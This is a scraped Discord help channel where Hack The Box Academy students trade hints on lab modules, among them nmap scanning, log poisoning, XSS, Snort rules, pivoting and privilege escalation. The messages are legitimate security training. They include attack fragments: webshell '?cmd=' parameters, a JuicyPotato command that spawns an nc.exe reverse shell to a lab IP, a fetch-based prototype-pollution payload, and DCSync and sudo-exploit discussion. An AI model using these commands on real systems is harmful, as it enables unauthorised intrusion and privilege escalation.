#modules

1 messages · Page 289 of 1

uneven oracle
#

Well the point is to “attempt” to access the webshell, then read the error message in the logs.

rustic sage
#

Don't ask to ask for help, ask for help directly kek

uneven oracle
#

This seems to give a different response, but I still don’t see what I’m looking for in the logs.

jolly raptor
#

Okay, well basically i’m on the question “Find all TCP ports and submit the total number found” i’ve tried doing numerous scans, with and without -Pn, -T4, -p- and nothing comes up apart from “host seems down, if it’s up but blocking ping probes use -Pn”

#

if i use -Pn no ports come up

rustic sage
#

Can you ping the host?

steady dust
uneven oracle
jolly raptor
#

tbh i haven’t tried resetting, i assumed it would be some hidden flag within nmap i need to use

uneven oracle
jolly raptor
#

when using -Pn it does say “host is up”

#

but all ports are in ignored state

rustic sage
#

Can you ping the target??

jolly raptor
#

i can yes but just reset it

vocal thistle
shut quest
jolly raptor
#

cool i’ll give it a go

rustic sage
steady dust
#

i think you have to run a command to trigger that error

shut quest
#

Now that you have the right page add ?cmd=id or go to the page in a browser

steady dust
#

try like ?cmd=whoami or id

#

and then you should see something in logs

naive sage
vocal thistle
jolly raptor
#

got it, thanks guys

uneven oracle
shut quest
woeful knot
#

I have an XSS-related question I would like to ask. Part of the HTML code is like this:
<span style="font-size: 16px;">Hello, ImXSS</span>
It's known that src, script (in both uppercase and lowercase), and svg code are blocked, but <> is not blocked. How can I test if XSS is effective?

uneven oracle
#

Got it…

#

Kinda

uneven oracle
vocal thistle
jolly raptor
#

got it, thank you

uneven oracle
vocal thistle
shut quest
#

Cool. Your image is a spoiler, please remove.

zenith vale
#

can someone help me in the log poisoning section?

#

of cbbh module at the academy?

#

the question is " Use any of the techniques covered in this section to gain RCE, then submit the output of the following command: pwd"

#

so what am i missing

little helm
#

Hey, I just started doing a few boxes.

I just did one and all the priv esc exploits were all on the desktop...is this normal? Given, it was rated easy but still, this seems...almost pointlessly simple

acoustic owl
# zenith vale so what am i missing

Without seeing exactly what you have done, I can only guess.
But a general tip.
Take a close look at the log file. Then think about which quotation marks do what in the log file.

zenith vale
#

its weird, well as the academy says the one parameter we havev control is the page

#

so when i did ls ,the marked part did some commands partially

#

i mean i could ls, but not ls+-la (url encoded)

#

or couldnt even do cd+/;ls so

rustic sage
#

why are you using netcat to transfer files? python3 -m http.server 8000 on your own box is a better option IMO. or you can use ssh file transfer, using the scp command.

zenith vale
#

@acoustic owl mind helpin me out in private?

acoustic owl
coral forge
#

Hey, I'm doing the Firewall and IDS/IPS Evasion - Hard Lab in the network enumeration with nmap module, and my scans are taking reallyy long for some reason (even if I try to do only "ip -p -sS"), could this be due to the IDS/IPS in place or is it something wrong with what I'm doing?

soft reef
coral forge
soft reef
upbeat oak
#

Haven't been able to do the modules through my own machine in a week, is anyone else having this issue? Pwnbox is cool but I prefer using my own

inland shuttle
#

Hi, I am stuck in the skills assessment for the Information Gathering module (https://academy.hackthebox.com/module/144/section/1311) on question 4. "After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb." Any hints? is the API key from the previous question to be used?

acoustic owl
inland shuttle
grand solar
#

quick question about how the tiers work in academy. Im currently using the student pass to go through the pentest path way, if I wanna do the the higher tiers (EX: Tier III, IV) after I'm done, is there a different subscription I have to use or do I have to just buy the individual modules?

twin nacelle
#

Working with IDS and IPS - Snort Rule Development :
There is a file named log4shell.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to log4shell exploitation attempts, where the payload is embedded within the user agent. Enter the keyword that should be specified right before the content keyword of the rule with sid 10000098 within the local.rules file so that an alert is triggered as your answer. Answer format: [keyword];

Im stuck tryna find the right keyword

vocal thistle
twin nacelle
cold root
#

Hello , I'm stuck in "Gain a shell on the vulnerable target, then submit the contents of the flag.txt file that can be found in C:" , inflitrating windows part module Shells & Payloads.
I'm using msf and I tried different exploit but each time things look nice but I didn't get the shell
Can you help me ?

wraith pelican
twin nacelle
wraith pelican
twin nacelle
#

since they look like just some placeholders for [keyword] to tell us to include a keyword followed by a ;

twin nacelle
#

with [http.user_agent]; for example

#

http.user_agent; isn't the answer either

wraith pelican
twin nacelle
#

what confuses me more is why isn't it the user agent that's required to search within since the rule content content:"|24 7b|jndi|3a|ldap|3a 2f 2f|" is actually found within the user agent

#

after inspecting the packet too

wraith pelican
cold root
jolly raptor
#

I’m currently doing the easy lab for Firewall and IDS/IPS, i’m scanning the target but with -sA for an ACK scan, using -Pn, -n for dns resolution however all same result in all ports are in ignored state

#

am i missing a flag here

wraith pelican
cold root
#

I'm using the pwnbox. I've no error but do not get the shell

wraith pelican
#

i just tried it and it works fine. can't say much more of you do not give much more : D

mortal rover
#

where is the discord windows 7 support lazy devs hmm

analog dock
#

Uh

#

<@&861185840277487616>

cold root
wraith pelican
chrome zodiac
#

Hello I have been struggling with this last question, I have access to shell and I need to gain root rights, I found CVE, sent it to server but bash deny the usage of exploit.c, then how im suppossed to get root rights??? CVE-2021-3156

wraith pelican
jolly raptor
#

also used -sV no ports show up

#

i understand there’s IDS/IPS in play so tried -T 1 -T 0 too

wraith pelican
jolly raptor
#

yeah, 80 i assume as http

wraith pelican
chrome zodiac
wraith pelican
#

yeah but there is shells everywhere bro

chrome zodiac
#

what

wraith pelican
# chrome zodiac what

you say: " this last question, " Ok but which one, provide the module name and section.

chrome zodiac
#

i don't have gcc, blocks install also

wraith pelican
#

that's too much spoil imo

chrome zodiac
#

I'm breaking head like 2 hours and just does nothing, nothing helps. Who even made this

soft reef
chrome zodiac
wraith pelican
vocal thistle
soft reef
chrome zodiac
soft reef
chrome zodiac
cold root
wraith pelican
wraith pelican
# chrome zodiac I couldn't find a python one

i don't think there is a python one iirc
i get it, this is frustrating but just take a step back
you got a vulnerable target,
but you can't compile on this target
so where else can you compile the exploit,
what can you do to make an exploit work even if it is not compile on the target?

chrome zodiac
#

man 😕

#

I tried on local too pal

tardy jungle
#

Module: whitebox attacks
Section: client side prototype pollution

I’ve been stuck for a long time trying to solve the section’s challenge, my payload works locally but still can’t solve the challenge….. need a hint or a little push:
This is my payload:

/profile.php?id=2&proto[src][]=data:,fetch("http://94.237.59.63:49231/admin.php?promote=2")

chrome zodiac
wraith pelican
#

yeah my bad i just realised you were on the metasploit module and not somewhere else

potent thorn
#

Hi guys, I'm on Windows Privilege Escalation Skills Assessment - Part I. I'm trying to escalate privs with juicypotato since I have the SeImpersonate Privilege enabled. i'm not sure why its not working.
c:\windows\temp\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\windows\temp\nc.exe 10.10.15.167 8443 -e cmd.exe" -t *

This is the error. Am I barking up the wrong tree?

#

Hi guys, I'm on Windows Privilege Escalation Skills Assessment - Part I. I'm trying to escalate privs with juicypotato since I have the SeImpersonate Privilege enabled. i'm not sure why its not working.
c:\windows\temp\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\windows\temp\nc.exe 10.10.15.167 8443 -e cmd.exe" -t *

This is the error. Am I barking up the wrong tree?

soft reef
potent thorn
#

yh

potent thorn
wraith pelican
potent thorn
#

nvm

#

got it working. thanks for the tip

wraith pelican
sharp pike
#

i''m having issues with the net.sh module on the pivoting section: i've set up the listener but when i try to connect to the DC i get this error.
Update: I have also tried utilizing the etherne1 2 IPv4 address to connect through w/ the same error

wraith pelican
soft reef
#

what does smh mean?

sharp pike
#

shaking my head

soft reef
#

ah lol ok

dapper roost
#

Hi guys! I have a question regarding a module. Is this the right place to ask about it?

dapper roost
#

I have a question about the Introduction to windows command like module and I have been told byt the dev to ask around on the discord for help

#

have been struggling for the past 2:40 hrs but nothing works

#

this is the page of the module

#

Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file.

#

this is the question

#

I cannot find the file using the given information in the module

candid lily
#

did you try using the where command with /R

dapper roost
#

yeah

#

i tried where /R C:\Users\htb-student\ waldo.txt

#

then where /R C:\Users\ waldo.txt

#

then where /R C:\ ...

#

you get the idea

#

i also tried find and findstr

#

but nothing

calm pewter
#

In the DNS chapter of Footprinting, the last question to find FQDN of IP ending with 203, I tried zone transferring and found few IPs listed below:

10.129.94.174   inlanefreight.htb
10.129.18.15    app.inlanefreight.htb
10.12.0.1       dev.inlanefreight.htb ns.dev.inlanefreight.htb
10.129.1.6      internal.inlanefreight.htb vpn.internal.inlanefreight.htb
10.129.18.201   mail1.inlanefreight.htb
10.129.34.16    dc1.internal.inlanefreight.htb
10.129.34.11    dc2.internal.inlanefreight.htb
10.129.18.200   mail1.internal.inlanefreight.htb
10.129.1.34     ws1.internal.inlanefreight.htb
10.129.1.35     ws2.internal.inlanefreight.htb
10.129.18.2     wsus.internal.inlanefreight.htb

and with both looping dig and dnsenum tried bruteforcing IPs as well with few dictionaries, but to no success. Any hints as to what I am missing?
Thank you!

calm pewter
#

I tried fierce, and top subdomains 11000 jhaddix

#

These 3

soft reef
calm pewter
#

So is it just a different list issue?

#

Got it@

dapper roost
#

:/

rustic sage
#

(through googling)

#

you need to enum all the possible domains, not only internal.inlanefreight.htb

#

till u find the correct one

#

which would give a list of records, one of which is an A record that has the ip x.x.x.203

wraith pelican
wild helm
#

Anyone having target performance issues?

vale salmon
#

Hi!

I'm working through Attacking Common Applications. I am on Attacking Joomla, but when I try to use the exploit the module suggests for Directory Traversal, I get the error that the module click is not found. However, pip identifies the install of click. The Pwnbox won't allow install of Python2.7 so am I missing something?

soft reef
vale salmon
static roost
#

Ever figure this out? I'm stuck here too.

sterile wharf
hardy elk
#

hello, i'm doing the "Server-Side attack" module, i'm at the "SSTI Exploitation Example 2", but i want to get a reverse shell without using the tool tplmap, but i can't do it, i don't know why... if someone could help me please 😅

stiff urchin
#

I'm facing this issue on Linux privesc module Miscellaneous Techniques CPTS path
Am i doing something wrong ? even i followed the walkthrough and gave me same error there is no user priv-esc.

polar widget
#

If anyone's doing windows lateral movement module then lemme know

naive wadi
soft reef
stiff urchin
#

Oh my Goshhh i'm an idiot!

#

Thanks for help thinking out loud guys 😅

hidden hemlock
#

please someone can help me with module bypass windows defender
Question "What is the version of the antivirus signatures which are installed?"
i try all way but no solution

bright coral
somber sentinel
#

Hi everyone, I am wondering if I missed something with this module:

I am working my way through 'Windows Event Logs and Finding Evil:
Tapping into ETW' (section 4)

Question is:

Replicate executing Seatbelt and SilkETW as described in this section and provide the ManagedInteropMethodName that starts with "G" and ends with "ion" as your answer. "c:\Tools\SilkETW_SilkService_v8\v8" and "C:\Tools\GhostPack Compiled Binaries" on the spawned target contain everything you need.

I noticed some other people in here had issues with this module, but mine isn't the same issue, and there wasn't anything in the solution when I tried reading through that which indicated I might have fouled something up.

Program 'SilkETW.exe' failed to run: The specified executable is not a valid application for this OS platform.At
line:1 char:1
+ .\SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038  ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038  ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed

PS C:\Tools\SilkETW_SilkService_v8\v8\SilkETW> .\SilkETW.exe
Program 'SilkETW.exe' failed to run: The specified executable is not a valid application for this OS platform.At
line:1 char:1
+ .\SilkETW.exe
+ ~~~~~~~~~~~~~.
At line:1 char:1
+ .\SilkETW.exe
+ ~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed```

As someone suggested in another post I've tried from both PowerShell and the command prompt as an admin. Any thoughts?
hidden hemlock
bright coral
grizzled schooner
#

using theHarvester
theHarvester -d (domain) -b google returns invalid source - any reason why?

fathom pendant
#

Need more info; what module are you working on?

grizzled schooner
#

oh shoot wrong channel - my apologies

hidden hemlock
fathom pendant
#

That's the section name

hidden hemlock
fathom pendant
#

Anyway I wasn't referring to you with the "not enough info" comment

heady hamlet
#

guys

#

i need help

#

im stuck on this question

#

Send a GET request to the above server, and read the response headers to find the version of Apache running on the server, then submit it as the answer. (answer format: X.Y.ZZ)

#

i need help

#

its broken i tried everything

fathom pendant
#

It's likely not broken

#

Iirc if you do -I it gives you the header

heady hamlet
#

it didnt give anything

fathom pendant
#

Is the target lab spawned?

heady hamlet
#

yea

fathom pendant
#

"Click here to spawn target"

heady hamlet
#

yes i did

fathom pendant
heady hamlet
#

in which command?

heady hamlet
fathom pendant
#

I assume the target is a public_ip:port

fathom pendant
#

So people that have done it can give you better instructions to help

heady hamlet
fathom pendant
#

It told you to use the spawned webserver

heady hamlet
#

ok lemme try

#

it tells me no such file or directory

fathom pendant
#

Command?

heady hamlet
#

yea

fathom pendant
#

I meant show the command

heady hamlet
#

my ip and my port

#

the ip

fathom pendant
#

🤦‍♀️

heady hamlet
#

http://94.237.59.199:52061:80

fathom pendant
#

Are you doing that with curl?

heady hamlet
fathom pendant
#

Don't do :80 at the end

#

But also

heady hamlet
fathom pendant
#

Your terminal is right

fathom pendant
heady hamlet
fathom pendant
#

🤦‍♀️

heady hamlet
#

sorry im new here

fathom pendant
#

Brother you need to learn how to critically think

#

Also, stop appending the :80 at the end

heady hamlet
#

ok

fathom pendant
#

You don't need to do that

fathom pendant
heady hamlet
#

oh ok

fathom pendant
#

Apply some logic

#

Ik you got a brain in there somewhere. Put it to work

heady hamlet
#

it says this

fathom pendant
#

Command?

heady hamlet
#

wait

#

i typed something wrong

#

curl -I 94.237.59.199:52061

#

thats it

#

@fathom pendant

#

??

heady hamlet
#

hello?

#

@fathom pendant where did u go i need help

#

...

faint geode
#

Dude chill, he will get back to you soon

heady hamlet
#

now where did he go

#

im waiting

#

@fathom pendant

#

are u ignoring me?

#

bruh

#

fine i dont need ur help anymore

dusky gyro
faint geode
#

^^^

heady hamlet
faint geode
#

No need to be so rude @heady hamlet

dim wolf
next bronze
dim wolf
#

you will have to do some research in this field

heady hamlet
#

ok i solved it the answer was in the modula already but the command doesnot work with me i just saw the version from the module command

analog dock
#

Smh lol

dusky gyro
fathom pendant
#

God forbid a girl has hobbies

rustic sage
#

Module footprinting, Section OracleTNS.

While using odat.py i can't seem to get the credentials, the IP address is the same i've inputted.

rustic sage
heady hamlet
#

ok

rustic sage
# heady hamlet ok

but make sure u understand where u went wrong, don't just be like ah yeyeyeye im a do this, literally read and see why u went wrong, try to understand it

dire abyss
zealous rune
#

Once we obtain foothold on a user machine with a normal user account, although we need admin to dump LSASS proc memory and SAM database, we can still get some value from mimikatz dumping kerberos tickets for the user. correct?

#

because kerberos tickets for the user we have the password for may give us access to other services on the network?

next bronze
kindred dawn
#

In the tunneling module, Im trying to do some reverse tunneling with chisel, but the ubuntu box (pivot host) gives me this error- and I cant install anything with apt on it to fix it- any solutions?

#

even after rebuilding it, restarting machine, etc

#

since machine has no internet access, this shit is lowk annoying

next bronze
#

your glibc version is too new

#

grab an older version from chisel repo release page

somber sentinel
#

#modules message

Took a break, moved ahead to the next section and came back to this. Ended up in the same spot in case anyone has anything to add.

wraith pelican
#

@somber sentinel i just tried, i do not understand how you get that error as it is pretty straight forward, same commands as the course and yours seem correct as far as i can tell. Did you try to respawn the same box to start fresh

storm elk
last owl
#

Hello just a quick question, are there any alternatives for downloading files from a Windows machine? I am currently attacking LSASS and extracting the lsass.dmp file, but it seems that the connection is suddenly cut off. I tried firing up an HTTP server from PowerShell, but the download speed is low, and the ETA is around 1 hour. I got the same results when looking up solutions on the module, the connection just cuts off.

next bronze
#

you can use a smbserver, but the speed isn't too different from a http upload sever running in your own machine. so maybe check your network connection

next bronze
last owl
#

Yeah I tried smbserver as well, the error is "network error occured". Currently using pwnbox and the closest one, but will try to look for other servers as well. Thanks!

next bronze
#

hmm that should work, reset the target and try again maybe

stark lark
#

PIVOTING, TUNNELING, AND PORT FORWARDING -> Remote/Reverse Port Forwarding with SSH

I want to access the windows target, to run my reverse shell payload, but I'm a bit unsure how to. In previous module, SOCKS tunneling was used, but there the windows credentials was also provided.

I'm not sure if I have to just redo the steps from last section, reuse pw's, and then add those steps from the current module in? I have answered the questions, but the module says "In addition to answering the challenge questions, practice this technique and try to obtain a reverse shell from the Windows target."

jade latch
#

AD Enumeration & Attacks - Skills Assessment 1
i've tried all variations of the dcsync command, nothing works

#

i can nslookup and ping the domain controller

cloud urchin
#

which machine are you running mimikatz on

jade latch
#

rdp into ms01

cloud urchin
#

that doesn't look like the dc to me

#

inlanefreight.local is the domain not the dc

jade latch
#

oh

#

in the module example "DCSync" it finds the DC itself

next bronze
#

I don't think you need to run mimi on the DC to dcsync

#

can you check if the host has an interface in the internal network

cloud urchin
#

no i don't think so, i thought he had /dc not /domain

#

i don't think i ever used mimikatz for that

next bronze
#

yeah

jade latch
next bronze
#

that's through a pivot? try with nxc smb <ip>

#

if nothing shows up reset the leb

cloud urchin
#

try /dc and adding the dc manually

next bronze
#

it should be able to resolve it though fqdn thonk

#

but yeah I don't use mimi for dcsync either

jade latch
#

resetting it one more time wouldn't hurt sadglas

#

yeah adding /dc doesn't work

#

searched up the command here and it shows someone getting the hash lol

cloud urchin
#

can you ping the dc

jade latch
cloud urchin
#

what if you put the dc's ip instead of hostname

#

sounds like you may just need to change regions or something

next bronze
#

wait you can reach the DC?

#

why not just do it remotely instead of using mimi

jade latch
#

uhuh

#

i need to impersonate t* user

#

is there a way to impersonate remotely?

#

i've changed regions now

wraith pelican
next bronze
#

you have the password

jade latch
#

i do

next bronze
#

yes so why do you need to imersonate

#

just use the username and password

dim wolf
#

i found myself using the linux tools more often for AD attacks like DCSync

#

doing it with mimikatz/rubeus is kinda annoying

jolly yacht
#

In Windows Fundamental, File System Section. NTFS permission for List-Folder content is specified including executing files also, i guess its mistakenly specified or not?

wraith pelican
# stark lark Thanks!

just a quick tip, i try to not terminate the target at each section, I just check if this is the same one on the next so there is no need to respawn a new one every time

stark lark
#

Should I look into these errors?

next bronze
#

I believe the metasploit module goes through this

jolly yacht
# next bronze this is correct

but List Folder Contents permission does not allow the assigned user to execute any files on the corresponding folder, right? then how executing files are possible?

coarse bane
#

anyone to privately discuss the Attacking Common Services -> SQL module?
I passed it but I've got an unanswered question.

boreal yew
#

Execuse me, I want to ask something. Why I can't get the correct answer in ZAP Scanner lesson (Module: Using Web Proxies) while I already submit the correct answer?

acoustic owl
boreal yew
#

I did, but it still says "Incorrect Answer"

#

Oh sorry nvm, you're right, I have a space at the beginning

#

Thanks!

low seal
#

Hi

#

any else got problems with libclntsh.so while installing odat?

#

running UTM Kali on M1

wraith pelican
#

odat is in the repos if you use parrot or kali, did you try that?

low seal
#

yeah apt install couldn't locate odat

#

E: Unable to locate package odat

wraith pelican
#

ow

low seal
#

I'm thinking it's not compatible with M1

#

arm

wraith pelican
#

yeah that's a possibility

low seal
low seal
#

thanks I'll check it out

wraith pelican
#

I just saw a comment, it seems to be working 🤞

wraith pelican
low seal
#

this would be great too

#

thanks for the assistance 🙂

somber sentinel
junior flicker
#

I need some clarification on the first question of the Windows File Transfer Methods in the File Transfers module. The question is: Download the file flag.txt from the web root using wget from the Pwnbox. Submit the contents of the file as your answer. What I'm not seeing is the target where the flag.txt is at. I enumerated the target, but I feel like the question is pointing me to the Pwnbox. I've used wget and understand the web root is a directory on a web server. Any ideas what I'm missing?

junior flicker
#

Is the target where I should be looking for flag.txt?

soft reef
#

yes correct.

junior flicker
#

Okay, thank you!

heady hamlet
#

when i reload the page in devtools no requests shows

#

can someone help me?

soft reef
heady hamlet
#

The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag

#

the question and the module is web requests

oak girder
sour jungle
#

has anyone done the bloodhound course? Looking specifically at the BloodHound for BlueTeams section. The last question. Which relationship (edge) do we need to remove to break the path between David and Domain Admins?

#

not finding anything in plumhound or bloodhound

wraith pelican
next bronze
long flint
#

For the HTTP/TLS skill assessment, the speed seems to take a very long time, and I'm constantly getting hit with the error 'no matching response on [Byte x] after the first couple work. I have to keep refreshing the box.

is my command just incorrect?
|| padbuster http://94.237.59.63:54332/token "0e0d74356da663454101d805584b6190eb57e7e30d9817ecfbf7973c9ab5df54f46a586de5c8693203896946088172a3" 16 -encoding 1 -post "token=0e0d74356da663454101d805584b6190eb57e7e30d9817ecfbf7973c9ab5df54f46a586de5c8693203896946088172a3" -cookie 'user=e229d8a9e42697ab26f61c38e00db5ae5f1cd90fdb85f20f81a48623746e914d3d2bdd97415095b66b720e552e81fedd00000000000000000000000000000000' -error 'Decryption Error. Invalid Token!' -usebody
||

hexed kestrel
#

heya. I started working on the XSS module and quickly realised i should get some basic knowledge of javascript (at least the basic structure and syntax) as i don't really understand what the commands i am entering are and how they function. Are there any websites or youtube playlists you guys can recommend surrounding the basics of javascript?

#

I had a look and there seem to be 1001 different websites and individuals teaching javascript, so i was hoping there was one you guys can recommend in particular

somber sentinel
#
hexed kestrel
#

nice thanks, will have a look at them

somber sentinel
#

Sure!

thorn hawk
#

Hello to all. I need some help to understand some strange behaviour. I am on the Remote File Inclusion chapter in the File Inclusion module. I am opening a python http server to download a PHP web shell inside the back end server to get RCE. When i do this from my root folder and my webshell is there the file gets downloaded and I get remote code execution. But when i host the file on a folder such as ~/Bounty/HTB (personal ) folder and I open the python server I still can get the download of the shell but I dont get remote code execution. Do you know whythis is happening?

thorn hawk
#

yes

#

lets me create this will paste in a sec

thorn hawk
#

This is when I do the same from the root folder which works directly

#

again PHP server on the right

#

this time it works fine

#

By the way the same result can happen though LFI hehe

dim wolf
#

look at the dir you started your web server in and then look at your file path in your download command

#

in the top screenshot, your web server is working in /home/alex/Bounty/HTB, and you request a file at http://ip/home/alex/Bounty/HTB/shell.php, so what you're trying to download is the file at /home/alex/Bounty/HTB/home/alex/Bounty/HTB/shell.php in your machine

#

second screenshot, your server is in the root dir, and you request /shell.php, so you would be downloading the file at /shell.php on your machine, which happens to be there

rustic sage
#

Can someone help me on the skills assesment for broken authentification, i have tried tampering with the sesion cookie, brute forcing logins, auth bypass via direct acses but nothing is working.

dim wolf
#

because you specified it in your URL

#

http://ip/home/alex/Bounty/HTB

thorn hawk
#

cool i get that

#

what should be included. Just again /flag.txt?

dim wolf
#

whatever you are trying to download, you have to specify the path relative to the location of your web server

thorn hawk
#

so the root server for the server is that HTB folder already?

dim wolf
#

if i have a file called rev.php in /home/calc/scripts/rev.php and i start my server in /home/calc, then the file in my server can be located at http://ip:port/scripts/rev.php

thorn hawk
#

heheheh i see the light :D

dim wolf
#

you can test this by starting a web server and then navigating to it in your browser

thorn hawk
#

i udnerstand

#

Thank you all for your input. That was to the point

rustic sage
tardy jungle
#

Was anyone able to solve the challenge for:
Module: Whitebox Attacks
Section: Client side prototype pollution
?

shut quest
oak girder
#

hi dear fellows

#

I would like to ask where to export this?

steady dust
oak girder
#

I want to dump, but I don’t know where to click

steady dust
#

i think it's right click -> dump memory to file

oak girder
#

I've been looking for 30 minutes and still can't find it

steady dust
#

select the address, right click on it then Dump Memory to File

#

you have to righ click on the memory address from here

oak girder
#

I found this

#

But he kept shaking, making it very difficult for me to click

steady dust
#

yes, after you identify the right adress here, just right click on it and then dump memory to file

#

i think if you sort it bt adress, or size, it will get stable

oak girder
#

He kept sliding up and down, and I clicked pause

fathom pendant
#

Well if it's still running it'll keep moving

oak girder
#

I clicked stop

#

So how should I save it?

#

He kept moving causing my dump to fail.

fathom pendant
#

If it's still moving, then you didn't stop it lol

steady dust
#

click on type and i think will get stable, or on protection

oak girder
#

I can only find this step

#

I don’t have the energy to search again. Can anyone tell me how to pause it?

rustic sage
#

someone pllsss help me, i am doing the broken auth skills check and i now have to login for the user gladys but cannot find the otp, i first tried a wordlist with 10000 nums and even 100000 but nothing is working, here is the command im using: ffuf -w ./tokens.txt -u http://94.237.59.63:39183/2fa.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=5t6i1j2qu0592dbl65nrclt4ie" -d "otp=FUZZ" -fr "Invalid OTP."

fathom pendant
#

Afaik you don't need to brute it but I haven't done this

rustic sage
#

??? wdym, i got the login and have already tryed other things like auth bypass via direct accses and attacking session tokens but that doesnt seem to be working

fathom pendant
#

just what others gave said ¯_(ツ)_/¯

rustic sage
#

what did others sayyy

#

nothing is working

#

is emotionaly damaging

rustic sage
fathom pendant
#

Utilize the discord search feature bro

rustic sage
#

good idea, thc u

#

noo wayyy did it, u where right i didnt need to brute the 2fa code just needed to: ||send req to profile.php after i loged in even without doing to 2fa||

vale knoll
#

I have a problem with Pivoting, Tunneling and port forwarding in icmp tunneling task

#

I cannot ssh to the pivot host

#

I can confirm that the port is up, by doing nmap scan or banner grab using netcat

#

however ssh fails every times and timeouts

#

looking at wireshark I can see that key exchange is initiated, but later I only see TCP Retrensmission packets from my host

#

followed by TCP RST and connection termination

#

Am I doing something wrong or the lab is simply not working properly?

stark lark
# wraith pelican it is the same target so... yes since the questions are just based on the writte...

Hey, let's say you are going through this content https://academy.hackthebox.com/module/158/section/1428 ( a section in pivoting ) Would you then read the material and then start the box and answer the questions, or start off with starting the box and following through as you progress?

fathom pendant
wraith pelican
#

maybe with a quick overview of the whole technique to know where i'm heading

modern magnet
#

Hello. I am sorry but i cannot post somewhere else. (is that normal?)

dim wolf
wraith pelican
modern magnet
#

Is that ok to fully customize the box we have?

marsh echo
dim wolf
marsh echo
#

i tried also like that

dim wolf
#

i don't remember how to save the config, but i believe it is explained somewhere in the HTB help documentation

modern magnet
#

alright, thanks again

zealous rune
#

What are ppl using 4 notetaking? Using obsidian. Thinking of switching to something more online. Perhaps github?

modern magnet
#

Personally i use CherryTree

zealous rune
modern magnet
#

Oh, sorry, didn't read that point

zealous rune
#

This is likely off topic tbf

modern magnet
#

the Pwnbox

steady dust
dim wolf
#

but most people use their own virtual machine

modern magnet
#

i'll do that way too

shut quest
#

Iirc, unless they changed it recently, you can only save on the labs pwnbox, the academy one does not have a way to do so.

shut quest
soft reef
modern magnet
#

it's ok, i'll do without pwnbox. I am poor.

marsh echo
shut quest
fathom pendant
soft reef
marsh echo
#

yes and that what i want after after my request that it be ignored so that it displays the username with the id 5 after maybe I misunderstood

soft reef
marsh echo
#

yesss i understand thank everyone

soft reef
marsh echo
#

I found it, but why put a user that doesn't exist if you want to retrieve the id of an existing user?

rare swan
#

Hello - Got a "question" about the skill assessmentn of the footprinting module easy-lab --> in the descripton it is stated that 3 internal servers has to be tested - first is a DNS server - whats the point of this - no DNS server has to be tested? Shouldnt this intro be removed or updated or am I missing anything?

marsh echo
#

ah because even if the gold operator user has a request that is true, it will be able to return the id = 5?

soft reef
marsh echo
#

indeed it works without anything

rare swan
#

ok

rare swan
#

yes i did

shut quest
#

I don't have specifics in my notes but iirc it's a ftp proxy and there's nothing to solve via dns

rare swan
#

yep

soft reef
rare swan
#

but it doesnt have to be tested or enumerated...

#

anyway

soft reef
rare swan
#

right

#

u only have to ssh to the machine - thats all

soft reef
rare swan
#

yes

soft reef
#

are you sure its footprinting?

rare swan
#

100%

soft reef
#

k give me a sec, im gonna log in

shut quest
#

hey @ocean night possible to dm you?

ocean night
#

Sure - will help if I can

stone meteor
#

module: WINDOWS PRIVILEGE ESCALATION
section: Credential Hunting

found passwords in
||Documents\stuff.txt
AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt
C:\inetpub\wwwroot\web.config||

none of them are accepted, any help?

stone meteor
soft reef
turbid echo
#

Hey, anyone did API attacks? In the Mass Assignment section what are we supposed to do? I created an order and trying to add items. I added success message = true and price = 0 but nothing works

shut quest
soft reef
zealous rune
zealous rune
#

yeah i've been thinking i should just use git hub

#

although i just read that notion allows u to publish your notes to the web

shut quest
#

obsidian notes are markdown?

turbid echo
#

Yes

acoustic owl
#

Then you know which endpoint you should use

turbid echo
#

In the Orders end point, I added OrderItems. It doesn't seem to be processing it. In the Items end point, it seems not to like product ID. I tried adding SuccessMessage:true and price:0 nothing works

turbid echo
acoustic owl
void hemlock
#

Can i ping someone to get a hint for AD Trust Attacks - Skills Assessment? thank you

cyan nacelle
#

hey im re-doing the "Information Gathering Web Edition - Skills Assessment" does anyone know how to specify the port for thereconspider.py. It seems like entire tool recently got a recall

fathom pendant
shut quest
#

it was i dont understand the problem he's trying to create for him/herself

fathom pendant
#

It's the same you'd specify as if viewing the page via browser; http://site.htb:port

cyan nacelle
fathom pendant
#

You can't post screenshots

cyan nacelle
#

ohh

#

well basically it didnt parse the port, it ignored it

fathom pendant
#

Because there is one on github that's a completely different tool

cyan nacelle
#

yes, i followed the instruction from htb

fathom pendant
#

And you're running it python3 ReconSpider.py http://[site.htb]:port

cyan nacelle
#

yes http://[vhosts.site.htb:port/sub] let me know if i need to edit this not to spoil

cyan nacelle
#

okay, it works for external sites like inlanefreight.com but for the skill assessment it allows returns blank results, am I doing something wrong enumeration wise or is it the tool?

potent thorn
#

Anyone know where we find the password for the sample report in the resources of the documentation and reporting module?

fathom pendant
fathom pendant
fathom pendant
cyan nacelle
fathom pendant
#

Drawing board*

cyan nacelle
#

the turn tables have turned

cyan nacelle
fathom pendant
#

Oh how the turns have tabled

potent thorn
cyan nacelle
dire abyss
gilded radish
#

hey, I'm doing "Network Enumeration with Nmap" and I'm on medium lab right now. I clearly know I have to use ||sudo nmap -sSU -p 53 --script dns-nsid $ip||, but as a result I don't get any response from the script, it just shows me opened udp port.

#

Unfortunaly, I can not send a screenshot

cyan nacelle
#

ty

fathom pendant
#

For w/e reason it's finicky on regular vms

gilded radish
#

thx

earnest sequoia
#

